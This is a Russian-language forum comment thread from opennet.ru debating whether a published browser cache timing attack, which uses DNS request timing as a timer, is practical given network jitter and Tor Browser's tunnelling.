  • 4.120, fuggy (ok), 18:02, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Для DNS-сервера, размещённого в той же Ethernet-сети, точность таймера оценивается примерно в 2 мс

    Так читаем статью. Джиттер в 2мс будет только, если DNS-сервер расположен у тебя в локалке или максимум у твоего провайдера. По данным из их исследования точность DNS-сервера в сети через Wi-Fi уже составляет 9мс, а до CloudFlare DNS составляет аж целых 70мс, и является не пригодным для совершения атаки.

     
     
  • 5.121, Онаним (?), 19:05, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Там и 2мс - это вечность целая. Волатильные данные в кеше живут намного меньше.
     
     
  • 6.123, fuggy (ok), 21:17, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Так DNS тут применяется только для измерения периода времени, потому что JavaScript таймер в Firefox в режиме усиленной защиты специально огрублён до 100мс. Поэтому нельзя точно замерить время между двумя моментами времени. Без этих извращений можно просто легко получить из performance.now() таймер с микросекундной! точностью. А дальше если у нас есть точный таймер можно произвести атаку Spectre. А вот что они из кеша таким образом читают, я из статьи так и не понял. Видимо важен сам факт.
     
     
  • 7.124, Онаним (?), 21:18, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    У тебя период времени получится +/- 1-2мс в пределах FE/GBE локалки, и +/- фиг знает сколько за пределами таковой.
     
  • 7.125, Онаним (?), 21:19, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Опять же, даже если у нас TE, буферы в свитчах сделают своё чёрное дело.
     
  • 3.116, Онаним (?), 16:36, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну и 2мс по меркам данных в процессорном кеше - вечность бесконечная.
     
  • 3.117, Аноним (101), 16:37, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > а прочитали миллиард раз

    Тут есть особенность, что эти запросы в разное время в разном окружении сделаны. Ты не можешь получить точность до бесконечности.

     
  • 3.119, fuggy (ok), 17:56, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Теоретически понятно, что можно повысить точность "усреднив" и отбросил систематические ошибки измерения, но читаем новость
    > Для DNS-сервера, размещённого в той же Ethernet-сети, точность таймера оценивается примерно в 2 мс

    А TorBrowser никогда не обращается к DNS напрямую, только через тоннель. А каждую секунду тоннель может быть разный и на другую сторону планеты. Так что DNS-сервер никогда не будет в одной Ethernet-сети.

    Подтвердите кто знает баг уже завели, действительно ли это затрагивает TorBrowser и там нет утечки DNS или это атака не работает в TowBrowser.

     

  • 1.128, Аноним (128), 16:07, 11/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Вот бы Эльбрус затестили)
     
  • 1.130, Аноним (130), 22:33, 11/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Аноньизм, а не атака.
     
  • 1.131, fuggy (ok), 15:04, 12/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    За что люблю opennet. Сегодня во всех новостях вижу заголовки:
    "В компьютерах Apple Mac нашли страшную уязвимость."
    "Чипы Apple M1 оказались уязвимыми."
    А по факту мы видит туже новость про "Prime+Probe".
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2021 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру